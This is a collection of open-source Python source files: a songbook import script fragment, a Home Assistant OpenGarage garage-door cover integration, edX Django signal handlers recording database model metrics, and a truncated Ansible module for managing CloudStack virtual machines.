except xml.parsers.expat.ExpatError:
title = 'No title'
author = ''
categories = ''
print 'MALFORMED:', path
Song(title=c.fix_encoding(title), path=path, author=c.fix_encoding(author),
categories=c.fix_encoding(categories), content=c.fix_encoding(content),
copyright=c.fix_encoding(copyright))
hub.commit() #commit song to database
# enter songbooks into database
for songbook in songbooklist:
if songbook.endswith('.comment') or songbook.endswith('.comment.dat') or songbook.endswith('.comment.dir') or songbook.endswith('.bak'):
continue # .comment files are not songbooks
print 'Songbook:', songbook
path = songbook.replace('\\', '/')
try:
dom = ET.parse(path)
if dom.find('title') != None: #don't die if no title
title = dom.find('title').text
else:
print 'NO TITLE:', path
title = 'No title'
except xml.parsers.expat.ExpatError:
title = 'No title'
print 'MALFORMED:', path
Songbook(title=c.fix_encoding(title), path=path)
hub.commit() #commit songbook to database
hub.end() #end connection to database
|
unlicense
|
Cinntax/home-assistant
|
homeassistant/components/opengarage/cover.py
|
1
|
5524
|
"""Platform for the opengarage.io cover component."""
import logging
import requests
import voluptuous as vol
from homeassistant.components.cover import (
CoverDevice,
DEVICE_CLASS_GARAGE,
PLATFORM_SCHEMA,
SUPPORT_OPEN,
SUPPORT_CLOSE,
)
from homeassistant.const import (
CONF_NAME,
STATE_CLOSED,
STATE_OPEN,
CONF_COVERS,
CONF_HOST,
CONF_PORT,
STATE_CLOSING,
STATE_OPENING,
)
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
ATTR_DISTANCE_SENSOR = "distance_sensor"
ATTR_DOOR_STATE = "door_state"
ATTR_SIGNAL_STRENGTH = "wifi_signal"
CONF_DEVICE_KEY = "device_key"
DEFAULT_NAME = "OpenGarage"
DEFAULT_PORT = 80
STATES_MAP = {0: STATE_CLOSED, 1: STATE_OPEN}
COVER_SCHEMA = vol.Schema(
{
vol.Required(CONF_DEVICE_KEY): cv.string,
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_NAME): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
}
)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{vol.Required(CONF_COVERS): cv.schema_with_slug_keys(COVER_SCHEMA)}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
    """Set up the OpenGarage covers."""
    entities = []
    for device_config in config.get(CONF_COVERS).values():
        entities.append(
            OpenGarageCover(
                {
                    CONF_NAME: device_config.get(CONF_NAME),
                    CONF_HOST: device_config.get(CONF_HOST),
                    CONF_PORT: device_config.get(CONF_PORT),
                    CONF_DEVICE_KEY: device_config.get(CONF_DEVICE_KEY),
                }
            )
        )

    add_entities(entities, True)
class OpenGarageCover(CoverDevice):
    """Representation of a OpenGarage cover."""

    def __init__(self, args):
        """Initialize the cover."""
        self.opengarage_url = "http://{}:{}".format(args[CONF_HOST], args[CONF_PORT])
        self._name = args[CONF_NAME]
        self._device_key = args[CONF_DEVICE_KEY]
        # Current STATE_* value, or None until the first successful update().
        self._state = None
        # State captured before a commanded move; used to roll back when the
        # device rejects the command (see _push_button) and to detect the
        # move's completion in update().
        self._state_before_move = None
        self._device_state_attributes = {}
        self._available = True

    @property
    def name(self):
        """Return the name of the cover."""
        return self._name

    @property
    def available(self):
        """Return True if entity is available."""
        return self._available

    @property
    def device_state_attributes(self):
        """Return the device state attributes."""
        return self._device_state_attributes

    @property
    def is_closed(self):
        """Return if the cover is closed.

        Returns None when the state is still unknown.  A door that is in
        the middle of opening is reported as closed until the device
        confirms the new state.
        """
        if self._state is None:
            return None
        return self._state in [STATE_CLOSED, STATE_OPENING]

    def close_cover(self, **kwargs):
        """Close the cover."""
        # No-op when already closed or closing.
        if self._state in [STATE_CLOSED, STATE_CLOSING]:
            return
        self._state_before_move = self._state
        self._state = STATE_CLOSING
        self._push_button()

    def open_cover(self, **kwargs):
        """Open the cover."""
        # No-op when already open or opening.
        if self._state in [STATE_OPEN, STATE_OPENING]:
            return
        self._state_before_move = self._state
        self._state = STATE_OPENING
        self._push_button()

    def update(self):
        """Get updated status from API.

        Marks the entity unavailable on connection errors; otherwise
        refreshes name, state, and the rssi/distance attributes from the
        device's /jc endpoint.
        """
        try:
            status = requests.get(f"{self.opengarage_url}/jc", timeout=10).json()
        except requests.exceptions.RequestException as ex:
            _LOGGER.error(
                "Unable to connect to OpenGarage device: %(reason)s", dict(reason=ex)
            )
            self._available = False
            return

        if self._name is None and status["name"] is not None:
            self._name = status["name"]
        state = STATES_MAP.get(status.get("door"))
        # While a commanded move is pending, only accept the device state
        # once it differs from the pre-move state (i.e. the move completed).
        if self._state_before_move is not None:
            if self._state_before_move != state:
                self._state = state
                self._state_before_move = None
        else:
            self._state = state

        _LOGGER.debug("%s status: %s", self._name, self._state)
        if status.get("rssi") is not None:
            self._device_state_attributes[ATTR_SIGNAL_STRENGTH] = status.get("rssi")
        if status.get("dist") is not None:
            self._device_state_attributes[ATTR_DISTANCE_SENSOR] = status.get("dist")
        if self._state is not None:
            self._device_state_attributes[ATTR_DOOR_STATE] = self._state

        self._available = True

    def _push_button(self):
        """Send commands to API.

        Triggers the device's button-click endpoint; on failure (result
        codes other than 1) logs the error and rolls the state back to the
        value saved in _state_before_move.
        """
        result = -1
        try:
            result = requests.get(
                f"{self.opengarage_url}/cc?dkey={self._device_key}&click=1", timeout=10
            ).json()["result"]
        except requests.exceptions.RequestException as ex:
            _LOGGER.error(
                "Unable to connect to OpenGarage device: %(reason)s", dict(reason=ex)
            )

        if result == 1:
            return

        if result == 2:
            _LOGGER.error("Unable to control %s: Device key is incorrect", self._name)
        elif result > 2:
            _LOGGER.error("Unable to control %s: Error code %s", self._name, result)

        self._state = self._state_before_move
        self._state_before_move = None

    @property
    def device_class(self):
        """Return the class of this device, from component DEVICE_CLASSES."""
        return DEVICE_CLASS_GARAGE

    @property
    def supported_features(self):
        """Flag supported features."""
        return SUPPORT_OPEN | SUPPORT_CLOSE
|
apache-2.0
|
y12uc231/edx-platform
|
common/djangoapps/monitoring/signals.py
|
172
|
4584
|
"""
Add receivers for django signals, and feed data into the monitoring system.
If a model has a class attribute 'METRIC_TAGS' that is a list of strings,
those fields will be retrieved from the model instance, and added as tags to
the recorded metrics.
"""
from django.db.models.signals import post_save, post_delete, m2m_changed, post_init
from django.dispatch import receiver
import dogstats_wrapper as dog_stats_api
def _database_tags(action, sender, kwargs):
    """
    Return a tags for the sender and database used in django.db.models signals.

    Arguments:
        action (str): What action is being performed on the db model.
        sender (Model): What model class is the action being performed on.
        kwargs (dict): The kwargs passed by the model signal.
    """
    tags = _model_tags(kwargs, 'instance') + [u'action:{}'.format(action)]
    if 'using' in kwargs:
        tags.append(u'database:{}'.format(kwargs['using']))
    return tags
def _model_tags(kwargs, key):
"""
Return a list of all tags for all attributes in kwargs[key].MODEL_TAGS,
plus a tag for the model class.
"""
if key not in kwargs:
return []
instance = kwargs[key]
tags = [
u'{}.{}:{}'.format(key, attr, getattr(instance, attr))
for attr in getattr(instance, 'MODEL_TAGS', [])
]
tags.append(u'model_class:{}'.format(instance.__class__.__name__))
return tags
@receiver(post_init, dispatch_uid='edxapp.monitoring.post_init_metrics')
def post_init_metrics(sender, **kwargs):
    """
    Record the number of times that django models are instantiated.

    Args:
        sender (Model): The model class sending the signals.
        using (str): The name of the database being used for this initialization (optional).
        instance (Model instance): The instance being initialized (optional).
    """
    dog_stats_api.increment(
        'edxapp.db.model',
        tags=_database_tags('initialized', sender, kwargs),
    )
@receiver(post_save, dispatch_uid='edxapp.monitoring.post_save_metrics')
def post_save_metrics(sender, **kwargs):
    """
    Record the number of times that django models are saved (created or updated).

    Args:
        sender (Model): The model class sending the signals.
        using (str): The name of the database being used for this update (optional).
        instance (Model instance): The instance being updated (optional).
    """
    if kwargs.pop('created', False):
        action = 'created'
    else:
        action = 'updated'

    dog_stats_api.increment(
        'edxapp.db.model',
        tags=_database_tags(action, sender, kwargs),
    )
@receiver(post_delete, dispatch_uid='edxapp.monitoring.post_delete_metrics')
def post_delete_metrics(sender, **kwargs):
    """
    Record the number of times that django models are deleted.

    Args:
        sender (Model): The model class sending the signals.
        using (str): The name of the database being used for this deletion (optional).
        instance (Model instance): The instance being deleted (optional).
    """
    dog_stats_api.increment(
        'edxapp.db.model',
        tags=_database_tags('deleted', sender, kwargs),
    )
@receiver(m2m_changed, dispatch_uid='edxapp.monitoring.m2m_changed_metrics')
def m2m_changed_metrics(sender, **kwargs):
    """
    Record the number of times that Many2Many fields are updated. This is separated
    from post_save and post_delete, because it's signaled by the database model in
    the middle of the Many2Many relationship, rather than either of the models
    that are the relationship participants.

    Args:
        sender (Model): The model class in the middle of the Many2Many relationship.
        action (str): The action being taken on this Many2Many relationship.
        using (str): The name of the database being used for this deletion (optional).
        instance (Model instance): The instance whose many-to-many relation is being modified.
        model (Model class): The model of the class being added/removed/cleared from the relation.
    """
    if 'action' not in kwargs:
        return

    # Only the "post_*" phases are counted; other phases are ignored.
    action_names = {
        'post_add': 'm2m.added',
        'post_remove': 'm2m.removed',
        'post_clear': 'm2m.cleared',
    }
    action = action_names.get(kwargs['action'])
    if not action:
        return

    tags = _database_tags(action, sender, kwargs)
    if 'model' in kwargs:
        tags.append('target_class:{}'.format(kwargs['model'].__name__))

    # pk_set may be absent or explicitly None (e.g. on clear); count 0 then.
    pk_set = kwargs.get('pk_set', []) or []
    dog_stats_api.increment(
        'edxapp.db.model',
        value=len(pk_set),
        tags=tags
    )
|
agpl-3.0
|
gundalow/ansible-modules-extras
|
cloud/cloudstack/cs_instance.py
|
10
|
36881
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2015, René Moser <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Ansible module metadata: stable public interface, maintained by the community.
ANSIBLE_METADATA = {'status': ['stableinterface'],
                    'supported_by': 'community',
                    'version': '1.0'}
DOCUMENTATION = '''
---
module: cs_instance
short_description: Manages instances and virtual machines on Apache CloudStack based clouds.
description:
- Deploy, start, update, scale, restart, restore, stop and destroy instances.
version_added: '2.0'
author: "René Moser (@resmo)"
options:
name:
description:
- Host name of the instance. C(name) can only contain ASCII letters.
- Name will be generated (UUID) by CloudStack if not specified and can not be changed afterwards.
- Either C(name) or C(display_name) is required.
required: false
default: null
display_name:
description:
- Custom display name of the instances.
- Display name will be set to C(name) if not specified.
- Either C(name) or C(display_name) is required.
required: false
default: null
group:
description:
- Group in where the new instance should be in.
required: false
default: null
state:
description:
- State of the instance.
required: false
default: 'present'
choices: [ 'deployed', 'started', 'stopped', 'restarted', 'restored', 'destroyed', 'expunged', 'present', 'absent' ]
service_offering:
description:
- Name or id of the service offering of the new instance.
- If not set, first found service offering is used.
required: false
default: null
cpu:
description:
- The number of CPUs to allocate to the instance, used with custom service offerings
required: false
default: null
cpu_speed:
description:
- The clock speed/shares allocated to the instance, used with custom service offerings
required: false
default: null
memory:
description:
- The memory allocated to the instance, used with custom service offerings
required: false
default: null
template:
description:
- Name or id of the template to be used for creating the new instance.
- Required when using C(state=present).
- Mutually exclusive with C(ISO) option.
required: false
default: null
iso:
description:
- Name or id of the ISO to be used for creating the new instance.
- Required when using C(state=present).
- Mutually exclusive with C(template) option.
required: false
default: null
template_filter:
description:
- Name of the filter used to search for the template or iso.
- Used for params C(iso) or C(template) on C(state=present).
required: false
default: 'executable'
choices: [ 'featured', 'self', 'selfexecutable', 'sharedexecutable', 'executable', 'community' ]
aliases: [ 'iso_filter' ]
version_added: '2.1'
hypervisor:
description:
- Name the hypervisor to be used for creating the new instance.
- Relevant when using C(state=present), but only considered if not set on ISO/template.
- If not set or found on ISO/template, first found hypervisor will be used.
required: false
default: null
choices: [ 'KVM', 'VMware', 'BareMetal', 'XenServer', 'LXC', 'HyperV', 'UCS', 'OVM' ]
keyboard:
description:
- Keyboard device type for the instance.
required: false
default: null
choices: [ 'de', 'de-ch', 'es', 'fi', 'fr', 'fr-be', 'fr-ch', 'is', 'it', 'jp', 'nl-be', 'no', 'pt', 'uk', 'us' ]
networks:
description:
- List of networks to use for the new instance.
required: false
default: []
aliases: [ 'network' ]
ip_address:
description:
- IPv4 address for default instance's network during creation.
required: false
default: null
ip6_address:
description:
- IPv6 address for default instance's network.
required: false
default: null
ip_to_networks:
description:
- "List of mappings in the form {'network': NetworkName, 'ip': 1.2.3.4}"
- Mutually exclusive with C(networks) option.
required: false
default: null
aliases: [ 'ip_to_network' ]
disk_offering:
description:
- Name of the disk offering to be used.
required: false
default: null
disk_size:
description:
- Disk size in GByte required if deploying instance from ISO.
required: false
default: null
root_disk_size:
description:
- Root disk size in GByte required if deploying instance with KVM hypervisor and want resize the root disk size at startup (need CloudStack >= 4.4, cloud-initramfs-growroot installed and enabled in the template)
required: false
default: null
security_groups:
description:
- List of security groups the instance to be applied to.
required: false
default: null
aliases: [ 'security_group' ]
domain:
description:
- Domain the instance is related to.
required: false
default: null
account:
description:
- Account the instance is related to.
required: false
default: null
project:
description:
- Name of the project the instance to be deployed in.
required: false
default: null
zone:
description:
    - Name of the zone in which the instance should be deployed.
- If not set, default zone is used.
required: false
default: null
ssh_key:
description:
- Name of the SSH key to be deployed on the new instance.
required: false
default: null
affinity_groups:
description:
- Affinity groups names to be applied to the new instance.
required: false
default: []
aliases: [ 'affinity_group' ]
user_data:
description:
- Optional data (ASCII) that can be sent to the instance upon a successful deployment.
- The data will be automatically base64 encoded.
- Consider switching to HTTP_POST by using C(CLOUDSTACK_METHOD=post) to increase the HTTP_GET size limit of 2KB to 32 KB.
required: false
default: null
vpc:
description:
- Name of the VPC.
required: false
default: null
version_added: "2.3"
force:
description:
- Force stop/start the instance if required to apply changes, otherwise a running instance will not be changed.
required: false
default: false
tags:
description:
- List of tags. Tags are a list of dictionaries having keys C(key) and C(value).
- "If you want to delete all tags, set a empty list e.g. C(tags: [])."
required: false
default: null
aliases: [ 'tag' ]
poll_async:
description:
- Poll async jobs until job has finished.
required: false
default: true
extends_documentation_fragment: cloudstack
'''
EXAMPLES = '''
# Create a instance from an ISO
# NOTE: Names of offerings and ISOs depending on the CloudStack configuration.
- cs_instance:
name: web-vm-1
iso: Linux Debian 7 64-bit
hypervisor: VMware
project: Integration
zone: ch-zrh-ix-01
service_offering: 1cpu_1gb
disk_offering: PerfPlus Storage
disk_size: 20
networks:
- Server Integration
- Sync Integration
- Storage Integration
delegate_to: localhost
# For changing a running instance, use the 'force' parameter
- cs_instance:
name: web-vm-1
display_name: web-vm-01.example.com
iso: Linux Debian 7 64-bit
service_offering: 2cpu_2gb
force: yes
delegate_to: localhost
# Create or update a instance on Exoscale's public cloud using display_name.
# Note: user_data can be used to kickstart the instance using cloud-init yaml config.
- cs_instance:
display_name: web-vm-1
template: Linux Debian 7 64-bit
service_offering: Tiny
ssh_key: [email protected]
tags:
- key: admin
value: john
- key: foo
value: bar
user_data: |
#cloud-config
packages:
- nginx
delegate_to: localhost
# Create an instance with multiple interfaces specifying the IP addresses
- cs_instance:
name: web-vm-1
template: Linux Debian 7 64-bit
service_offering: Tiny
ip_to_networks:
- network: NetworkA
ip: 10.1.1.1
- network: NetworkB
ip: 192.0.2.1
delegate_to: localhost
# Ensure an instance is stopped
- cs_instance:
name: web-vm-1
state: stopped
delegate_to: localhost
# Ensure an instance is running
- cs_instance:
name: web-vm-1
state: started
delegate_to: localhost
# Remove an instance
- cs_instance:
name: web-vm-1
state: absent
delegate_to: localhost
'''
RETURN = '''
---
id:
description: UUID of the instance.
returned: success
type: string
sample: 04589590-ac63-4ffc-93f5-b698b8ac38b6
name:
description: Name of the instance.
returned: success
type: string
sample: web-01
display_name:
description: Display name of the instance.
returned: success
type: string
sample: web-01
group:
description: Group name of the instance is related.
returned: success
type: string
sample: web
created:
description: Date of the instance was created.
returned: success
type: string
sample: 2014-12-01T14:57:57+0100
password_enabled:
description: True if password setting is enabled.
returned: success
type: boolean
sample: true
password:
description: The password of the instance if exists.
returned: success
type: string
sample: Ge2oe7Do
ssh_key:
description: Name of SSH key deployed to instance.
returned: success
type: string
sample: key@work
domain:
description: Domain the instance is related to.
returned: success
type: string
sample: example domain
account:
description: Account the instance is related to.
returned: success
type: string
sample: example account
project:
description: Name of project the instance is related to.
returned: success
type: string
sample: Production
default_ip:
description: Default IP address of the instance.
returned: success
type: string
sample: 10.23.37.42
public_ip:
description: Public IP address with instance via static NAT rule.
returned: success
type: string
sample: 1.2.3.4
iso:
description: Name of ISO the instance was deployed with.
returned: success
type: string
sample: Debian-8-64bit
template:
description: Name of template the instance was deployed with.
returned: success
type: string
sample: Debian-8-64bit
service_offering:
description: Name of the service offering the instance has.
returned: success
type: string
sample: 2cpu_2gb
zone:
description: Name of zone the instance is in.
returned: success
type: string
sample: ch-gva-2
state:
description: State of the instance.
returned: success
type: string
sample: Running
security_groups:
description: Security groups the instance is in.
returned: success
type: list
sample: '[ "default" ]'
affinity_groups:
description: Affinity groups the instance is in.
returned: success
type: list
sample: '[ "webservers" ]'
tags:
description: List of resource tags associated with the instance.
returned: success
type: dict
sample: '[ { "key": "foo", "value": "bar" } ]'
hypervisor:
description: Hypervisor related to this instance.
returned: success
type: string
sample: KVM
instance_name:
description: Internal name of the instance (ROOT admin only).
returned: success
type: string
sample: i-44-3992-VM
'''
import base64
# import cloudstack common
from ansible.module_utils.cloudstack import *
class AnsibleCloudStackInstance(AnsibleCloudStack):
    """Manage a CloudStack virtual machine instance.

    Thin wrapper around the CloudStack API client (``self.cs``) provided by
    the ``AnsibleCloudStack`` base class.  Helpers such as ``get_account``,
    ``get_zone``, ``has_changed``, ``poll_job``, ``ensure_tags`` and
    ``is_vm_in_vpc`` come from that base class (defined outside this file).
    """

    def __init__(self, module):
        super(AnsibleCloudStackInstance, self).__init__(module)
        # Map CloudStack API result keys to the module's return value keys.
        self.returns = {
            'group': 'group',
            'hypervisor': 'hypervisor',
            'instancename': 'instance_name',
            'publicip': 'public_ip',
            'passwordenabled': 'password_enabled',
            'password': 'password',
            'serviceofferingname': 'service_offering',
            'isoname': 'iso',
            'templatename': 'template',
            'keypair': 'ssh_key',
        }
        # Per-run caches to avoid repeated API lookups.
        self.instance = None
        self.template = None
        self.iso = None

    def get_service_offering_id(self):
        """Return the id of the requested service offering.

        Falls back to the first offering the API returns when the
        ``service_offering`` parameter is unset; fails the module when the
        requested offering (matched by name or id) cannot be found.
        """
        service_offering = self.module.params.get('service_offering')

        service_offerings = self.cs.listServiceOfferings()
        if service_offerings:
            if not service_offering:
                return service_offerings['serviceoffering'][0]['id']

            for s in service_offerings['serviceoffering']:
                if service_offering in [ s['name'], s['id'] ]:
                    return s['id']
        self.module.fail_json(msg="Service offering '%s' not found" % service_offering)

    def get_template_or_iso(self, key=None):
        """Resolve the 'template' or 'iso' parameter to an API object.

        Returns ``None`` when neither parameter is set, otherwise the cached
        or freshly looked-up template/ISO (matched by displaytext, name or
        id), reduced via ``_get_by_key(key, ...)``.  Fails the module when
        the requested template/ISO is not found.
        """
        template = self.module.params.get('template')
        iso = self.module.params.get('iso')

        if not template and not iso:
            return None

        args = {}
        args['account'] = self.get_account(key='name')
        args['domainid'] = self.get_domain(key='id')
        args['projectid'] = self.get_project(key='id')
        args['zoneid'] = self.get_zone(key='id')
        args['isrecursive'] = True

        if template:
            if self.template:
                return self._get_by_key(key, self.template)

            args['templatefilter'] = self.module.params.get('template_filter')
            templates = self.cs.listTemplates(**args)
            if templates:
                for t in templates['template']:
                    if template in [ t['displaytext'], t['name'], t['id'] ]:
                        self.template = t
                        return self._get_by_key(key, self.template)
            self.module.fail_json(msg="Template '%s' not found" % template)

        elif iso:
            if self.iso:
                return self._get_by_key(key, self.iso)
            # 'template_filter' doubles as the ISO filter (alias 'iso_filter').
            args['isofilter'] = self.module.params.get('template_filter')
            isos = self.cs.listIsos(**args)
            if isos:
                for i in isos['iso']:
                    if iso in [ i['displaytext'], i['name'], i['id'] ]:
                        self.iso = i
                        return self._get_by_key(key, self.iso)
            self.module.fail_json(msg="ISO '%s' not found" % iso)

    def get_disk_offering_id(self):
        """Return the id of the requested disk offering, or None if unset."""
        disk_offering = self.module.params.get('disk_offering')

        if not disk_offering:
            return None

        disk_offerings = self.cs.listDiskOfferings()
        if disk_offerings:
            for d in disk_offerings['diskoffering']:
                if disk_offering in [ d['displaytext'], d['name'], d['id'] ]:
                    return d['id']
        self.module.fail_json(msg="Disk offering '%s' not found" % disk_offering)

    def get_instance(self):
        """Find and cache the VM matching name/display_name (and VPC)."""
        instance = self.instance
        if not instance:
            instance_name = self.get_or_fallback('name', 'display_name')
            vpc_id = self.get_vpc(key='id')

            args = {
                'account': self.get_account(key='name'),
                'domainid': self.get_domain(key='id'),
                'projectid': self.get_project(key='id'),
                'vpcid': vpc_id,
            }
            # Do not pass zoneid, as the instance name must be unique across zones.
            instances = self.cs.listVirtualMachines(**args)
            if instances:
                for v in instances['virtualmachine']:
                    # Due the limitation of the API, there is no easy way (yet) to get only those VMs
                    # not belonging to a VPC.
                    if not vpc_id and self.is_vm_in_vpc(vm=v):
                        continue
                    # Match case-insensitively on name/displayname, exactly on id.
                    if instance_name.lower() in [ v['name'].lower(), v['displayname'].lower(), v['id'] ]:
                        self.instance = v
                        break
        return self.instance

    def get_iptonetwork_mappings(self):
        """Translate 'ip_to_networks' into API 'iptonetworklist' entries."""
        network_mappings = self.module.params.get('ip_to_networks')
        if network_mappings is None:
            return

        if network_mappings and self.module.params.get('networks'):
            self.module.fail_json(msg="networks and ip_to_networks are mutually exclusive.")

        network_names = [n['network'] for n in network_mappings]
        ids = self.get_network_ids(network_names)
        res = []
        # get_network_ids preserves the order of network_names, so ids[i]
        # corresponds to network_mappings[i].
        for i, data in enumerate(network_mappings):
            res.append({'networkid': ids[i], 'ip': data['ip']})
        return res

    def security_groups_has_changed(self):
        """Return True when the requested security groups differ from the VM's."""
        security_groups = self.module.params.get('security_groups')
        if security_groups is None:
            return False

        security_groups = [s.lower() for s in security_groups]
        instance_security_groups = self.instance.get('securitygroup',[])

        instance_security_group_names = []
        for instance_security_group in instance_security_groups:
            if instance_security_group['name'].lower() not in security_groups:
                return True
            else:
                instance_security_group_names.append(instance_security_group['name'].lower())

        for security_group in security_groups:
            if security_group not in instance_security_group_names:
                return True
        return False

    def get_network_ids(self, network_names=None):
        """Resolve network names/ids to a list of network ids (order kept)."""
        if network_names is None:
            network_names = self.module.params.get('networks')

        if not network_names:
            return None

        args = {
            'account': self.get_account(key='name'),
            'domainid': self.get_domain(key='id'),
            'projectid': self.get_project(key='id'),
            'zoneid': self.get_zone(key='id'),
            'vpcid': self.get_vpc(key='id'),
        }
        networks = self.cs.listNetworks(**args)
        if not networks:
            self.module.fail_json(msg="No networks available")

        network_ids = []
        network_displaytexts = []
        for network_name in network_names:
            for n in networks['network']:
                if network_name in [ n['displaytext'], n['name'], n['id'] ]:
                    network_ids.append(n['id'])
                    network_displaytexts.append(n['name'])
                    break

        if len(network_ids) != len(network_names):
            self.module.fail_json(msg="Could not find all networks, networks list found: %s" % network_displaytexts)

        return network_ids

    def present_instance(self, start_vm=True):
        """Ensure the instance exists (deploy/recover/update) and is tagged."""
        instance = self.get_instance()

        if not instance:
            instance = self.deploy_instance(start_vm=start_vm)
        else:
            instance = self.recover_instance(instance=instance)
            instance = self.update_instance(instance=instance, start_vm=start_vm)

        # In check mode, we do not necessarily have an instance
        if instance:
            instance = self.ensure_tags(resource=instance, resource_type='UserVm')
            # refresh instance data
            self.instance = instance

        return instance

    def get_user_data(self):
        """Return the base64-encoded user data, or None if unset.

        NOTE(review): ``base64.b64encode(str(...))`` is Python 2 era code;
        under Python 3 b64encode requires bytes — verify before porting.
        """
        user_data = self.module.params.get('user_data')
        if user_data is not None:
            user_data = base64.b64encode(str(user_data))
        return user_data

    def get_details(self):
        """Build the custom-offering 'details' list; requires all of
        cpu/cpu_speed/memory to be set (enforced via required_together)."""
        res = None
        cpu = self.module.params.get('cpu')
        cpu_speed = self.module.params.get('cpu_speed')
        memory = self.module.params.get('memory')
        if all([cpu, cpu_speed, memory]):
            res = [{
                'cpuNumber': cpu,
                'cpuSpeed': cpu_speed,
                'memory': memory,
            }]
        return res

    def deploy_instance(self, start_vm=True):
        """Deploy a new VM; always reports changed (even in check mode)."""
        self.result['changed'] = True

        networkids = self.get_network_ids()
        if networkids is not None:
            networkids = ','.join(networkids)

        args = {}
        args['templateid'] = self.get_template_or_iso(key='id')
        if not args['templateid']:
            self.module.fail_json(msg="Template or ISO is required.")

        args['zoneid'] = self.get_zone(key='id')
        args['serviceofferingid'] = self.get_service_offering_id()
        args['account'] = self.get_account(key='name')
        args['domainid'] = self.get_domain(key='id')
        args['projectid'] = self.get_project(key='id')
        args['diskofferingid'] = self.get_disk_offering_id()
        args['networkids'] = networkids
        args['iptonetworklist'] = self.get_iptonetwork_mappings()
        args['userdata'] = self.get_user_data()
        args['keyboard'] = self.module.params.get('keyboard')
        args['ipaddress'] = self.module.params.get('ip_address')
        args['ip6address'] = self.module.params.get('ip6_address')
        args['name'] = self.module.params.get('name')
        args['displayname'] = self.get_or_fallback('display_name', 'name')
        args['group'] = self.module.params.get('group')
        args['keypair'] = self.module.params.get('ssh_key')
        args['size'] = self.module.params.get('disk_size')
        args['startvm'] = start_vm
        args['rootdisksize'] = self.module.params.get('root_disk_size')
        args['affinitygroupnames'] = ','.join(self.module.params.get('affinity_groups'))
        args['details'] = self.get_details()

        security_groups = self.module.params.get('security_groups')
        if security_groups is not None:
            args['securitygroupnames'] = ','.join(security_groups)

        # Only pass a hypervisor when the template/ISO does not dictate one.
        template_iso = self.get_template_or_iso()
        if 'hypervisor' not in template_iso:
            args['hypervisor'] = self.get_hypervisor()

        instance = None
        if not self.module.check_mode:
            instance = self.cs.deployVirtualMachine(**args)

            if 'errortext' in instance:
                self.module.fail_json(msg="Failed: '%s'" % instance['errortext'])

            poll_async = self.module.params.get('poll_async')
            if poll_async:
                instance = self.poll_job(instance, 'virtualmachine')
        return instance

    def update_instance(self, instance, start_vm=True):
        """Apply offering/metadata/SSH-key/security-group changes.

        Changes are only applied when the VM is stopped or ``force`` is set;
        the VM is stopped first and restarted afterwards if it was running.
        """
        # Service offering data
        args_service_offering = {}
        args_service_offering['id'] = instance['id']
        if self.module.params.get('service_offering'):
            args_service_offering['serviceofferingid'] = self.get_service_offering_id()
        service_offering_changed = self.has_changed(args_service_offering, instance)

        # Instance data
        args_instance_update = {}
        args_instance_update['id'] = instance['id']
        args_instance_update['userdata'] = self.get_user_data()
        args_instance_update['ostypeid'] = self.get_os_type(key='id')
        if self.module.params.get('group'):
            args_instance_update['group'] = self.module.params.get('group')
        if self.module.params.get('display_name'):
            args_instance_update['displayname'] = self.module.params.get('display_name')
        instance_changed = self.has_changed(args_instance_update, instance)

        # SSH key data
        args_ssh_key = {}
        args_ssh_key['id'] = instance['id']
        args_ssh_key['projectid'] = self.get_project(key='id')
        if self.module.params.get('ssh_key'):
            args_ssh_key['keypair'] = self.module.params.get('ssh_key')
        ssh_key_changed = self.has_changed(args_ssh_key, instance)

        security_groups_changed = self.security_groups_has_changed()

        changed = [
            service_offering_changed,
            instance_changed,
            security_groups_changed,
            ssh_key_changed,
        ]

        if True in changed:
            force = self.module.params.get('force')
            instance_state = instance['state'].lower()

            if instance_state == 'stopped' or force:
                self.result['changed'] = True
                if not self.module.check_mode:

                    # Ensure VM has stopped
                    instance = self.stop_instance()
                    instance = self.poll_job(instance, 'virtualmachine')
                    self.instance = instance

                    # Change service offering
                    if service_offering_changed:
                        res = self.cs.changeServiceForVirtualMachine(**args_service_offering)
                        if 'errortext' in res:
                            self.module.fail_json(msg="Failed: '%s'" % res['errortext'])
                        instance = res['virtualmachine']
                        self.instance = instance

                    # Update VM
                    if instance_changed or security_groups_changed:
                        if security_groups_changed:
                            args_instance_update['securitygroupnames'] = ','.join(self.module.params.get('security_groups'))
                        res = self.cs.updateVirtualMachine(**args_instance_update)
                        if 'errortext' in res:
                            self.module.fail_json(msg="Failed: '%s'" % res['errortext'])
                        instance = res['virtualmachine']
                        self.instance = instance

                    # Reset SSH key
                    if ssh_key_changed:
                        instance = self.cs.resetSSHKeyForVirtualMachine(**args_ssh_key)
                        if 'errortext' in instance:
                            self.module.fail_json(msg="Failed: '%s'" % instance['errortext'])

                        instance = self.poll_job(instance, 'virtualmachine')
                        self.instance = instance

                    # Start VM again if it was running before
                    if instance_state == 'running' and start_vm:
                        instance = self.start_instance()
        return instance

    def recover_instance(self, instance):
        """Recover a VM that is in destroying/destroyed state."""
        if instance['state'].lower() in [ 'destroying', 'destroyed' ]:
            self.result['changed'] = True
            if not self.module.check_mode:
                res = self.cs.recoverVirtualMachine(id=instance['id'])
                if 'errortext' in res:
                    self.module.fail_json(msg="Failed: '%s'" % res['errortext'])
                instance = res['virtualmachine']
        return instance

    def absent_instance(self):
        """Destroy the VM (without expunging) if it exists."""
        instance = self.get_instance()
        if instance:
            if instance['state'].lower() not in ['expunging', 'destroying', 'destroyed']:
                self.result['changed'] = True
                if not self.module.check_mode:
                    res = self.cs.destroyVirtualMachine(id=instance['id'])

                    if 'errortext' in res:
                        self.module.fail_json(msg="Failed: '%s'" % res['errortext'])

                    poll_async = self.module.params.get('poll_async')
                    if poll_async:
                        instance = self.poll_job(res, 'virtualmachine')
        return instance

    def expunge_instance(self):
        """Destroy-and-expunge the VM, regardless of destroyed state."""
        instance = self.get_instance()
        if instance:
